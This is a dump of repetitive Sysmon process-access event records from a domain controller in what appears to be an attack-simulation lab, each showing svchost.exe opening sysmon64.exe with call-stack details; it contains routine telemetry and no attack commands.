09:20:17.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053237Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053236Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053235Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053234Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053233Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053232Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053231Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053230Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053229Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053228Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053227Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053226Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053225Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053224Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053223Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053222Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053221Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053220Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053219Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053218Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053217Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053216Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053215Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053214Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 